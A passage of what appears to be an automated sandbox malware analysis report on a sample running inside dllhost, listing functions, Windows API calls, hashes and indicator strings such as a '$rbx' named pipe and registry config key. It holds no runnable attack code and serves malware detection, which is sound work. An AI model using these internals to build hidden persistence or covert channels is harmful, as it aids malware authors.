Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 583f668019d724963af80605361ae3d41cf3ba93d383c24edd8b6b9c28e4161f
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 8C419033214F80DAEB60DF61E85839A77B1F389B9AF44811ADA8947758DF3DC446CB04

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 0000025DC1CE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1CE10B1
RegEnumValueW.ADVAPI32 ref: 0000025DC1CE1117
GetProcessHeap.KERNEL32 ref: 0000025DC1CE115A
HeapAlloc.KERNEL32 ref: 0000025DC1CE1168
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1185
HeapFree.KERNEL32 ref: 0000025DC1CE1193

Strings

d, xrefs: 0000025DC1CE10D6

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 8cf4101336de69d39b66bcd0350f4050413b4cfc2622334bc1f5f6bcc6dacbd7
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 1941B373214F80C6E760CFA1E94879EB7A1F389B8AF448116EB8947758DF38C485CB04

Function 0000025DC1AC2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000025DC1AC252D
GetCurrentProcessId.KERNEL32 ref: 0000025DC1AC2537
CreateFileW.KERNEL32 ref: 0000025DC1AC2568
WriteFile.KERNEL32 ref: 0000025DC1AC2590
ReadFile.KERNEL32 ref: 0000025DC1AC25AF
CloseHandle.KERNEL32 ref: 0000025DC1AC25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000025DC1AC2549

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 82d0d4ec9a487e7a08364d8f12726fb1e32ee536505f281c350188cd3be9f0dc
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: F4113A32614F50C2E720DB61F85835A7770F799BA7F944216EA9982BA8CF3CC14ACB44

Function 0000025DC1CE2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000025DC1CE252D
GetCurrentProcessId.KERNEL32 ref: 0000025DC1CE2537
CreateFileW.KERNEL32 ref: 0000025DC1CE2568
WriteFile.KERNEL32 ref: 0000025DC1CE2590
ReadFile.KERNEL32 ref: 0000025DC1CE25AF
CloseHandle.KERNEL32 ref: 0000025DC1CE25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000025DC1CE2549

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 9663626f580ba14fe8b62036fcc7097086aaf728f643182d95d3ea9056aa6c00
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: A0114C32614B50C2E720CB61FA5875AB760F799BD6F940316FB5A82BA8CF3CC144CB48

Function 0000025DC1AC7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025DC1AC7C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000025DC1AC7CCA
_RTC_Initialize.LIBCMT ref: 0000025DC1AC7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025DC1AC7D1E
__scrt_release_startup_lock.LIBCMT ref: 0000025DC1AC7D49

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: c7527366ca1727aaa5aa45f06d1c47d3e4024756d7df73bde20cb4e2c8c7812d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B481E121600F3186FE74EBE69C6936962E0BBB1783F4440179A09C7396DF3AC857C708

Function 0000025DC1A97050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025DC1A97078
__scrt_acquire_startup_lock.LIBCMT ref: 0000025DC1A970CA
_RTC_Initialize.LIBCMT ref: 0000025DC1A970F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025DC1A9711E
__scrt_release_startup_lock.LIBCMT ref: 0000025DC1A97149

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 9ea26ee7aae33351cf769d29042c58c0d5d9ff325487fb3c318ea3293413ac6f
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B081D560600F7046FA74DBE5BC4939D2691ABB6783F184027A909C7396DB38C8C7CF28

Function 0000025DC1CE7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000025DC1CE7C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000025DC1CE7CCA
_RTC_Initialize.LIBCMT ref: 0000025DC1CE7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000025DC1CE7D1E
__scrt_release_startup_lock.LIBCMT ref: 0000025DC1CE7D49

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: d43931c4ff1abc2d83c0a9c8dbebc866e76321360bb7e7bac24c56c24e5d60bc
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8F81C621600F6186FA709BE59E8D359E690BF75B87F444017FA09C7396DB38C9E5C348

Function 0000025DC1AC9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B31
GetLastError.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B3F
LoadLibraryExW.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B69
FreeLibrary.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9BD7
GetProcAddress.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9BE3

Strings

api-ms-, xrefs: 0000025DC1AC9B51

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 22f7c187993d097fabf22fe213ab63450a834abfa8b9a524b58ac52e57fa4db1
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: DD31E621212F60E1EE31DB92DC1839523A4B764BA3F990526ED1E8B790DF39C446C31C

Function 0000025DC1CE9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B31
GetLastError.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B3F
LoadLibraryExW.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B69
FreeLibrary.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9BD7
GetProcAddress.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9BE3

Strings

api-ms-, xrefs: 0000025DC1CE9B51

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: a1d2b37b0a6217c8ec8bedd44a83cab24a1856824bb8a5c685908dd413a92a6d
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 41319421312F60D1EE31DB869E08795A394BB65BA3F990626FD19C7B90DF38C484C358

Function 0000025DC1AD3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000025DC1AD3431
GetLastError.KERNEL32 ref: 0000025DC1AD343D
CloseHandle.KERNEL32 ref: 0000025DC1AD3455
CreateFileW.KERNEL32 ref: 0000025DC1AD3480
WriteConsoleW.KERNEL32 ref: 0000025DC1AD349F

Strings

CONOUT$, xrefs: 0000025DC1AD3461

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 5d0fabf62a07252250c52fe6c1d7acd9e4f52e1651ce7530251a45ce61e4b5ca
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 83119321310F5086E760DBD2EC5871966B0F7A8BE7F444215EA5DC7B94CF38C955C748

Function 0000025DC1CF3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000025DC1CF3431
GetLastError.KERNEL32 ref: 0000025DC1CF343D
CloseHandle.KERNEL32 ref: 0000025DC1CF3455
CreateFileW.KERNEL32 ref: 0000025DC1CF3480
WriteConsoleW.KERNEL32 ref: 0000025DC1CF349F

Strings

CONOUT$, xrefs: 0000025DC1CF3461

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: ef4b6b13b7fb8c502b36630a37dc8b04f1ed3bc9eae145cab425049416f05ab8
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 03116035310F6086E7608B92ED58719AAA0F7A8BE7F544216FA5EC7B94CF38C444C748

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$rbx-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$rbx-config
API String ID: 3013565938-3990243012
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 0000025DC1AC6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC62AB
GetThreadContext.KERNEL32 ref: 0000025DC1AC6415

Part of subcall function 0000025DC1AC60A0: GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC60A4

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: d4495617840bf4ef7d3530d228c75b83b900e158ced1c8eae1bc07a6532ebb34
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 3BD19D36208F9885DE70DB5AE8A835A77B0F798B86F100116EA8D87775DF3DC552CB04

Function 0000025DC1CE6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE62AB
GetThreadContext.KERNEL32 ref: 0000025DC1CE6415

Part of subcall function 0000025DC1CE60A0: GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE60A4

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 9fa46aef5a3546e36e445dd9fcf37bfed42517b05e1b190a597de4546402388c
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 68D19D76215FA881DA70DB4AE99835AB7A0F7D8B8AF100116EACD87765CF3CC591CB04

Function 0000025DC1AC2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000025DC1AC20A6
TlsFree.KERNEL32 ref: 0000025DC1AC225F
TlsFree.KERNEL32 ref: 0000025DC1AC226B
TlsFree.KERNEL32 ref: 0000025DC1AC2277
TlsFree.KERNEL32 ref: 0000025DC1AC2283
TlsFree.KERNEL32 ref: 0000025DC1AC228F

Part of subcall function 0000025DC1AC5E50: GetCurrentThreadId.KERNEL32 ref: 0000025DC1AC5E66

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: f7d47dcced0f682302553882f79a5782f2e5910e04511fc0c2019939754a7b76
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: EE510934201F6585EF25EBA4DC682A823A2FB64747F804817E52DC73A5EF79C52BC348

Function 0000025DC1CE2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000025DC1CE20A6
TlsFree.KERNEL32 ref: 0000025DC1CE225F
TlsFree.KERNEL32 ref: 0000025DC1CE226B
TlsFree.KERNEL32 ref: 0000025DC1CE2277
TlsFree.KERNEL32 ref: 0000025DC1CE2283
TlsFree.KERNEL32 ref: 0000025DC1CE228F

Part of subcall function 0000025DC1CE5E50: GetCurrentThreadId.KERNEL32 ref: 0000025DC1CE5E66

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
